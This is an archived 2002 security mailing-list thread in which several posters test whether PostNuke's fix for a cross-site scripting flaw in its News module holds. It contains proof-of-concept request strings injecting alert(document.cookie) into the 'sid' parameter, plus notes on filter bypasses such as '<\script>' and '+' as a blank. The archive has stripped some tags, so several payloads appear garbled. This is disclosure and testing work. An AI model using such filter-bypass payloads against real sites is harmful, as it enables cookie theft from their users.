subject:"Postnuke XSS fixed"

Re: Postnuke XSS fixed

2002-10-07 Thread Muhammad Faisal Rauf Danka


Now it is redirecting back to the /index.php on all attempts mentioned 
previously , No more HTTP VARIABLE Error.

Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202

_
---
[ATTITUDEX.COM]
http://www.attitudex.com/
---

_
Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, 
POP & more! http://www.everyone.net/selectmail?campaign=tag

Re: Postnuke XSS fixed

2002-10-03 Thread Muhammad Faisal Rauf Danka


I just checked it again :

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=alert(document.cookie);

where + denotes a blank space or similarly this one:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=alert(document.cookie);

resulting in Sorry - $HTTP_GET_VARS contains javascript... Msg.

However the request:
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);

or any character inserted before first "script" and after first less than "<" 
resulting in DB Error, revealing nothing (user/pass/path etc).

But I used I.E and Netscape, maybe it's different with other browsers. :)

Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202


--- Daniel Woods <[EMAIL PROTECTED]> wrote:
>
>Humm!
>
>> on 26th Sep the following url:
>> http://news.postnuke.com/modules.php
>>  
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>>
>> used to give Alert PopUp and
>> Error:
>> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
>> at line 23
>>
>> now it gives:
>> Sorry - $HTTP_GET_VARS contains javascript...
>>
>> Prompt fix by PostNuke team, great work Keep it up! :)
>
>Not so fast on the praise :(
>
>It only took me a couple of workarounds to find ways to bypass the check.
>
>  http://news.postnuke.com/modules.php
> 
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>
>Using the request...
> 
>?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);
>gives me the DB Error: message
>
>And using the request...
> 
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>gives me the Alert Popup and DB Error: message...  the '+' is treated as a blank.
>
>Thanks... Dan.

_
---
[ATTITUDEX.COM]
http://www.attitudex.com/
---

_
Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, 
POP & more! http://www.everyone.net/selectmail?campaign=tag

Re: Postnuke XSS fixed

2002-10-03 Thread Sebastian Konstanty Zdrojewski

I saw the problem has been solved, and the get you proposed below are no
more working. But if you use the following get, the popup appears again:

on the url http://news.postnuke.com/modules.php

the get

?op=modload&name=News&file=article&sid=alert(document.cookie);

Best Regars,

Sebastian

Daniel Woods wrote:

  >Humm!
  >
  >
  >
  >
  >Not so fast on the praise :(
  >
  >It only took me a couple of workarounds to find ways to bypass the check.
  >
  >  http://news.postnuke.com/modules.php
  > 
?op=modload&name=News&file=article&sid=